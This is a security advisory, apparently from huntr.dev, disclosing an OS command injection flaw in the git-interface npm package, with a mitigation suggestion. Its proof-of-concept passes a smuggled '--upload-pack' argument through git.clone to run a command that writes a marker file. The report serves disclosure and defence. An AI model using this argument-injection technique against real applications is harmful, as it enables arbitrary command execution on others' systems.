History: Apr 16, 2022 - 10:32 a.m.

Command Injection vulnerability in [email protected]

2022-04-16 10:32:40
lirantal
www.huntr.dev

EPSS score: 0.002 (Low); percentile: 60.3%


git-interface describes itself as an interface to work with a git repository in node.js.

Resources:

I’m reporting an OS Command Injection vulnerability in the git-interface npm package. The API may be abused if user input is able to provide a valid directory on disk and to supply the destination directory to clone a repository to.

Proof of Concept exploit

Install [email protected], which is the latest version.

Run the following code with the following precondition: the /tmp/new directory needs to exist (it doesn’t need to be a .git-initialized directory, though), so a predictable path such as /usr/src could be provided instead:

const { Git } = require('git-interface');

const git = new Git({
	dir: '/tmp/new' //default path is current directory
});

git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');

Observe a new file created: /tmp/pwned

Mitigation suggestions

Use the -- end-of-options notation as a suffix of the supported command-line arguments (if any are supported at all), so that input passed to the git command is treated as positional arguments rather than as command-line arguments. For example: git clone -- <path> <destination> would prevent path and destination from being interpreted as command-line arguments for the git command.

Author

Liran Tal
